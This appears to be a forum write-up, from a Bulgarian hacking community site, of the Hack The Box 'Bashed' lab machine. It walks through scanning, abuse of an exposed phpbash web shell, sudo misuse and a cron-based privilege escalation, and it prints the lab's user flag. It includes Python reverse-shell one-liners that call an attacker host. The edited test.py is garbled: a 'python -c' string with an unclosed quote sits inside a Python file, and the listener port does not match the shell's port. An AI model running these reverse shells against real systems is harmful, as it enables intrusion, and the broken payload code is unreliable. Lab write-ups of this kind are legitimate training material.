Преминете към съдържанието

МЕУ организира кампания за пентестове в държавната администрация

Целта на кампанията е да подобри киберсигурността в държавната администрация, като участието в нея е доброволно и не се обвързва с възнаграждение.
Прочети повече за програмата

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

  • HTB - WriteUps

Bashed


h3xu

158 views

# Enumeration

## NMAP
We have an open port at 80, running Apache 2.4.18 (UBUNTU).


# nmap -A 10.10.10.68                        

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 03:14 EDT
Nmap scan report for 10.10.10.68
Host is up (0.050s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/8%OT=80%CT=1%CU=43586%PV=Y%DS=2%DC=T%G=Y%TM=606EAD62
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops

TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   50.56 ms 10.10.14.1
2   50.73 ms 10.10.10.68

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.14 seconds


 

## Let's see what's this website is about.## Dirbuster report
It reveals bunch of directories and files that are interesting:
 

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Apr 08 03:25:09 EDT 2021
--------------------------------

http://10.10.10.68:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/
/css/
/dev/
/images/
/js/
/demo-images/
/php/
/uploads/

Dirs found with a 403 response:

/icons/
/icons/small/

--------------------------------
Files found during testing:

Files found with a 200 responce:

/dev/phpbash.min.php
/index.html
/single.html
/css/carouFredSel.css
/css/clear.css
/dev/phpbash.php
/css/common.css
/css/font-awesome.min.css
/css/sm-clean.css
/js/jquery.js
/js/imagesloaded.pkgd.js
/js/jquery.nicescroll.min.js
/js/jquery.smartmenus.min.js
/js/jquery.carouFredSel-6.0.0-packed.js
/js/jquery.mousewheel.min.js
/js/jquery.touchSwipe.min.js
/js/jquery.easing.1.3.js
/js/main.js
/js/custom_google_map_style.js
/js/html5.js
/config.php
/php/sendMail.php

--------------------------------


 

The developer boasts about a phpbash file which he created onto the platform. Let's use it to get a foothold.

# Burp Suite
I am going to try and see the contents of the discovered files.

## Request
The file runs bash commands on the local host. Let's cat our flags 🙂

POST /dev/phpbash.min.php/ HTTP/1.1

Host: 10.10.10.68

Content-Length: 41

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36

Content-type: application/x-www-form-urlencoded

Accept: */*

Origin: http://10.10.10.68

Referer: http://10.10.10.68/dev/phpbash.min.php/

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

cmd=cd /home/arrexel;pwd;ls;cat user.txt;


 

## Response
user flag: 2c281f318555dbc1b856957c7147bfc1

HTTP/1.1 200 OK

Date: Thu, 08 Apr 2021 08:02:27 GMT

Server: Apache/2.4.18 (Ubuntu)

Content-Length: 56

Connection: close

Content-Type: text/html; charset=UTF-8

/home/arrexel
user.txt
2c281f318555dbc1b856957c7147bfc1

 

### Let's see how we can escalate our privileges and gain root.

Firstly, get reverse shell:
1. change attacking IP:PORT

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

 

### Let's upgrade our shell, so that we could make it more usable:
1. Spawn better shell: python3 -c 'import pty;pty.spawn("/bin/bash")'  
2. Get access to term commands: export TERM=xterm  
3. Background the shell with CNTRL + Z and turn on autocomplete etc. by typing in original terminal: stty raw -echo; fg

 

# Privelege Esc.

* Ran linenum.sh locally but nothing really was of interest.
* Looked for SGID/SUID files.
* finally looking into sudoers I received the following output:

$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL


 

It seems we (www-data) could run commands as user scriptmanager since it does not require password.

 

$ sudo -u scriptmanager whoami
scriptmanager


 

To become user *scriptmanager* we type in:
 

sudo -u scriptmanager bash -i 


 

Let's enumerate further. What does this user owns or has access to?

 

scriptmanager@bashed:/$ find / -type f -user scriptmanager 2>/dev/null
/scripts/test.py
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.selected_editor
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout


 

It appears it owns something within /scripts/test.py
 

scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close


 

It opens test.txt and writes a string into it, hmm. Who owns test.txt?

 

scriptmanager@bashed:/scripts$ ll
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  8 03:19 ./
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ../
-rw-r--r--  1 scriptmanager scriptmanager  282 Apr  8 03:19 test.py
-rw-r--r--  1 root          root            12 Apr  8 03:03 test.txt

So, if it is executed by cron, test.py runs as root since it opens test.txt which is owned by root. Let's add sauce: [python reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
 

scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("change 123!")
python -c 'import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
f.close


 

It writes out the 
### pwn

# nc -lnvp 1337  
listening on \[any\] 1337 ...  
connect to \[10.10.14.24\] from (UNKNOWN) \[10.10.10.68\] 50176  
/bin/sh: 0: can’t access tty; job control turned off  
# whoami  
root  
# cat /root/root.txt 

 

0 Comments


Recommended Comments

Няма коментари

HACKING.BG Партньори

Asset3.png.df693f7661f6e8a7a3ec208659eda80b.pngtransparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy